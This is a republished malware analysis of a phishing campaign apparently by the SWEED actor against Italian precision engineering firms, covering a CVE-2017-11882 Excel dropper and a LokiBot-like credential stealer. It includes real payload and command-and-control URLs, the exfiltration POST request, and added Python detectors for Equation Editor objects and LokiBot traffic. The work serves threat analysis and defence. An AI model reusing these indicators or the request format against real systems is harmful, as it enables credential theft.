Security expert Marco Ramilli published a quick analysis of an interesting attack carried out by the SWEED threat actor against precision engineering firms in Italy.

Introduction

Today I’d like to share a quick analysis of an interesting attack targeting precision engineering companies based in Italy. Precision engineering is a very important business market in Europe: it includes developing mechanical equipment for automotive, railways, heavy industries and military-grade technology. The attacker pretended to be a customer and sent the victim a well-crafted email containing a Microsoft XLS file that included real spare-part codes, quantities and shipping addresses, a very similar attack scheme to the MartyMCFly campaign.

Technical Analysis

Hash: 863934c1fa4378799ed0c3e353603ba0bee3a357a5c63d845fe0d7f4ebc1a64c
Threat: Microsoft Excel Document
Brief Description: Exploiter, Dropper and Executor targeting precision engineering companies
Ssdeep: 384:janC18qmTUKhKVxbo6JpM2gwmeJxQrHwFeDtug/uND40C2D:janCOqm4tVxE6rM2g0fO2exuxC0FD

On 2019-10-26 a well-crafted email coming from steel@vardhman.com and asking for an economic proposal reached specific mailboxes belonging to the purchasing department of a well-known precision engineering company. Basically the attacker asks the victims to quote the entire list of spare parts included in an attached Excel document. The source address looks genuine since it belongs to a big company in the textile field, which frequently uses precision equipment in its production chain.

Attacker Spreadsheet looking real

Once the victim opens the document, they actually see a real-looking Microsoft Excel spreadsheet. Surprisingly, the spreadsheet holds no macro code, so no suspicious message and no request to enable macros or compatibility mode appears on the victim’s screen. Everything looks genuine except for the third object included in the Excel file.

Object-3 exploiting CVE-2017-11882.

If you are familiar with CVE-2017-11882 you might notice it immediately; if you are not, you may take a look HERE (for the exploit generation), HERE (for an example) and HERE (for the original CVE disclosure). In a nutshell, CVE-2017-11882 is a 17-year-old memory corruption issue in Microsoft Office (including Office 365). When exploited successfully, it lets attackers execute code on a vulnerable machine, even without further user interaction, once a malicious document is opened. The flaw resides within Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that inserts or edits Object Linking and Embedding (OLE) objects in documents.

Once the victim opens the document apparently nothing happens, but silently Object 3 launches Equation Editor and exploits the memory corruption vulnerability, executing code on the host.
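Because the document carries no macro, the useful triage check is whether an OLE file embeds an Equation Editor object at all. The following added example (not from the original post) is a byte-level heuristic, not a full CFB parser: it looks for the Equation Editor 3.0 class id, the "Equation Native" stream name and the "Equation.3" ProgID, and separately reports whether a VBA project is present. The sample documents are constructed stand-ins, not real files.

```python
"""Heuristic scan of an OLE2 (CFB) document for an embedded Equation Editor object."""
import struct

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"        # CFB file signature
EQNEDT_CLSID = "0002CE02-0000-0000-C000-000000000046"   # Equation Editor 3.0 class id


def clsid_to_bytes(clsid: str) -> bytes:
    """Serialise a textual GUID the way an OLE directory entry stores it:
    first three fields little-endian, the last two as raw bytes."""
    d1, d2, d3, d4, d5 = clsid.split("-")
    return (struct.pack("<IHH", int(d1, 16), int(d2, 16), int(d3, 16))
            + bytes.fromhex(d4) + bytes.fromhex(d5))


# Stream and storage names inside a CFB file are stored as UTF-16LE.
INDICATORS = {
    "equation_editor_clsid": clsid_to_bytes(EQNEDT_CLSID),
    "equation_native_stream": "Equation Native".encode("utf-16-le"),  # MTEF payload stream
    "equation_progid": b"Equation.3",
}
VBA_PROJECT = "_VBA_PROJECT".encode("utf-16-le")  # present only when macros exist


def scan_ole(data: bytes) -> dict:
    """Return which Equation Editor indicators appear and whether macros are present."""
    hits = [name for name, pattern in INDICATORS.items() if pattern in data]
    return {
        "is_ole": data.startswith(OLE_MAGIC),
        "indicators": hits,
        "has_macros": VBA_PROJECT in data,
        # A macro-free document that still embeds Equation.3 deserves a closer look.
        "suspicious": bool(hits),
    }


def fake_cfb(entries: list) -> bytes:
    """Constructed stand-in for a CFB file: magic, header padding, then 128-byte
    directory-entry-sized fragments. Hypothetical helper, not a real writer."""
    return OLE_MAGIC + b"\x00" * 504 + b"".join(e.ljust(128, b"\x00") for e in entries)


# Constructed samples: one with an Equation.3 entry (CLSID sits at offset 80 of a
# directory entry, as in real CFB files), one with only a Workbook stream.
SAMPLE_EQNEDT = fake_cfb(["Equation Native".encode("utf-16-le"),
                          b"\x00" * 80 + clsid_to_bytes(EQNEDT_CLSID)])
SAMPLE_CLEAN = fake_cfb(["Workbook".encode("utf-16-le")])
```

A hit is a triage signal, not a verdict: legitimate documents can embed Equation.3 objects, and the RTF variant of this exploit stores the object as hex text, which a raw byte search will not match.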

Equation Editor Crashes and Execute Code

The code execution implements a classic drop-and-execute routine: it downloads a Windows PE file from http[://mail.hajj.zeem.sa/wp-admin/edu/educrety.exe and runs it directly in memory, a fileless behaviour.

Analysis of Dropped PE File

Hash: 64114c398f1c14d4e840f62395edd9a8c43d834708f8d8fce12f8a6502b0e981
Threat: Sensitive data stealer
Brief Description: Looks for stored passwords and tries to push them to command and control servers
Ssdeep: 6144:htbOljxWyjJypr+QqhdJdUwcPWFNEwXh/XEVOwG6Fro:h9OXByoXLU7eFNEwREVOJv

educrety.exe

The dropped PE (educrety.exe) is compiled with Microsoft Visual C++ and holds a nice icon :P. According to the VirusTotal detection history, the same hash has been seen under at least three different names: educrety.exe, prestezza.exe and cardsharper.exe. ExifTool shows that prestezza.exe is the original file name while the internal project name is cardsharper.exe. Once the sample runs it harvests information from many registry keys where vendors typically store access credentials or access tokens, such as those of FTP and SSH clients, mail clients and Outlook profiles (the full list of registry keys is available here).


Once it gets the credentials it pushes them to a command and control server, http[://www.corpcougar.com/edu/Panel/five/fre.php, in the following way:

POST /edu/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.corpcougar.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: EEABFA
Content-Length: 190
Connection: close

Network Trace

Considering the User-Agent, the network trace and most of all the push path, it reminds me of the LokiBot malware. “Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.” – PhishMe. Playing a little with the command and control, it turns out that more than one command and control panel was installed on the same domain, each one with a different path; the sample I analysed was using only one of them. It makes sense since VT collected different samples related to the analysed one, which probably belong to different malware campaigns with different artifact names.
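The attribution above rests on three traits of the POST: the fixed User-Agent string, the non-standard Content-Key header and the binary POST to a fre.php panel path. The following added example (not from the original post) turns those traits into a small detector that can be run over captured HTTP requests; the sample request is reconstructed from the trace shown above, the benign one is constructed, and the scoring threshold of two matching traits is an assumption.

```python
"""Flag LokiBot-style credential-exfiltration POSTs in captured HTTP requests."""
import re

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"  # User-Agent seen in the trace above
PANEL_PATH = re.compile(r"/fre\.php$")          # LokiBot panel gate script


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into its request line and a lower-cased header map."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def lokibot_score(raw: str) -> dict:
    """Collect matching LokiBot traits; alert when at least two of them are present."""
    req = parse_request(raw)
    h = req["headers"]
    reasons = []
    if h.get("user-agent") == LOKIBOT_UA:
        reasons.append("lokibot user-agent")
    if req["method"] == "POST" and req["version"] == "HTTP/1.0":
        reasons.append("POST over HTTP/1.0")
    if "content-key" in h:            # non-standard header carried by LokiBot beacons
        reasons.append("content-key header")
    if h.get("content-type") == "application/octet-stream" and PANEL_PATH.search(req["path"]):
        reasons.append("binary POST to fre.php panel path")
    return {"host": h.get("host"), "path": req["path"], "reasons": reasons,
            "alert": len(reasons) >= 2}


# Constructed sample reproducing the request shown in the post (body omitted).
SAMPLE_C2_POST = """POST /edu/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.corpcougar.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: EEABFA
Content-Length: 190
Connection: close
"""

# Constructed benign request for comparison.
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0\n"
```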

IndexOf C&C

ATT&CK TTP Summary

The following MITRE ATT&CK mapping was compiled according to the findings.

Initial Access: T1193 (Spearphishing Attachment)

Execution: T1204 (User Execution)

Defense Evasion: T1107 (File Deletion, deletes the original file after infection), T1158 (Hidden Files and Directories), T1045 (Software Packing, the threat comes packed/encrypted)

Credential Access: T1003 (Credential Dumping), T1081 (Credentials in Files), T1214 (Credentials in Registry)

Collection: T1005 (Data from Local System)

Exfiltration: T1002 (Data Encrypted)

Command and Control: T1043 (Commonly Used Port), T1071 (Standard Application Layer Protocol)

Conclusions

According to Cisco Talos (here and here), a large number of ongoing malware distribution campaigns, including such notable malware as Formbook, LokiBot and Agent Tesla, could be related to a single threat actor called “SWEED”. I found many similarities to “SWEED”, including the original attack vector, the Microsoft Office exploit used, the LokiBot implementation and the type of victims, so I believe this attack could also be attributed to the same threat actor. Moreover, the techniques used and the care put into the overall attack, which included a study of the victim’s products (remember the real spare-part codes in the Excel file?), remind me of a more recent analysis by Fortinet, so I believe that one might be attributed to the same threat actor as the attack described here.

Finally, I think the “SWEED” threat actor is attacking Italian precision engineering companies. The TTPs and communication scheme are so close to each other that it is hard to believe in a coincidence.

The original post, including IoCs and Yara rules, is available on Marco Ramilli’s blog:

Pierluigi Paganini